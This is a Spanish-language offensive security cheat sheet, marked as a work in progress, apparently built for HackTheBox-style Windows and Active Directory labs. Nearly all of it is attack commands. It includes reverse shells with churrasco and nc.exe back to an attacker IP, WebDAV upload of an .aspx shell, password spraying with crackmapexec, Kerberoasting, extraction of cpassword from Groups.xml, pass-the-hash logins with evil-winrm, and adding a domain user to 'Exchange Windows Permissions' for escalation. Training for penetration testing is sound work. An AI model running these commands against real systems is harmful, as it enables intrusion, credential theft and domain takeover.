Herramientas

¡¡¡Trabajando en este apartado!!!

Transferir Archivos Windows

SeImpersonatePrivilege

Compartimos por smbFolder

smbserver.py (-smb2support) share . copy \10.10.16.8\share\<> APP

Ejecución del churrasco con nc.exe .\churrasco.exe -d "C:\PATH\nc.exe -e cmd.exe IP PORT"

.\churrasco.exe -d "C:\Windows\System32\cmd.exe"
impacket-smbserver smbFolder $(pwd) -smb2support copy \IP\Folder\APP APP

Subida De Archivos Web IIS

(Sudo)

davtest -url http://IP

CADAVER

Cadaver -> put archivo -> MOVE archivo archivo.aspx start /b \IP\share.exe -e cmd IP PORT

certutil

CRACKMAPEXEC

cme smb IP -u dict.txt -p dict.txt 
cme winrm IP -u 'USER' -p 'PASS' 
cme smb IP -u 'USER' -p 'PASS' --shares

findstr password

SSH PORT FORWARDING

ssh -L PORT:LOCALHOST:PORT USER@IP
scp APP USER@IP:PATH

MONTURA FTP

mkdir /mnt/ftp curlftpfs user:pass@IP /PATH/
mount -t cifs //0.0.0.0/Users /mnt/smbmounted -o username=USER,password=PASS,domain=domain,rw
smbclient
    smbclient -L 0.0.0.0 -N
    smbclient //IP/Replication -N
smbmap : Nos lista los permisos
    smbmap -H 0.0.0.0 -R Replication -A Groups.xml
    smbmap -d active.htb -u 'USER' -p 'PASS' -H 0.0.0.0 -R Users -A user.txt -q
rpcclient -U "" 0.0.0.0

smbcacls //0.0.0.0/Replication domain -U 'USER%PASS'

rpcclient -U 'USER%PASS' 0.0.0.0 -c "enumdomusers"
rpcclient -U 'USER%PASS' 0.0.0.0 -c "querygroupmem 0x200" | awk '{print $1}' | grep -oP '\[.*?\]' | tr -d "[]"

rpcclient -U 'USER%PASS' 0.0.0.0 -c "querygroupmem 0x200" | awk '{print $1}' | grep -oP '\[.*?\]' | tr -d "[]" | while read rid; do rpcclient -U 'USER%PASS' 0.0.0.0 -c "queryuser $rid"; done

rpcclient -U 'USER%PASS' 0.0.0.0 -c "querygroupmem 0x200" | awk '{print $1}' | grep -oP '\[.*?\]' | tr -d "[]" | while read rid; do rpcclient -U 'USER%PASS' 0.0.0.0 -c "queryuser $rid" | grep "User Name" | awk 'NF{print $NF}'; done

rpcclient -U 'USER%PASS' 0.0.0.0 -c "querygroupmem 0x200" | awk '{print $1}' | grep -oP '\[.*?\]' | tr -d "[]" | while read rid; do echo "$rid: $(rpcclient -U 'USER%PASS' 0.0.0.0 -c "queryuser $rid" | grep "User Name" | awk 'NF{print $NF}')"; done

grep -o 'cpassword="+"'

GetADUsers.py -all domain/user:pass -dc-ip 0.0.0.0 
GetUserSPNs.py domain/user:pass -dc-ip 0.0.0.0 -request -output tgs.hash
(rdate -n 0.0.0.0)

PSEXEC

psexec domain/USER:PASS@0.0.0.0

LDAPDOMAINDUMP

ldapdomaindump -u 'USER' -p 'PASS' IP

EVIL-WINRM

evil-winrm -i IP -u 'USER' -p 'PASS'
evil-winrm -i IP -u 'USER' -H 'HASH'

NEO4J

neo4j console : neo4j:Password
bloodhound

SharpHound.ps1
    Import-Module .\SharpHound.ps1
    Invoke-BloodHound -CollectionMethod All
net user ale ale123! /add /domain
net user
net group "Exchange Windows Permissions" ale /add
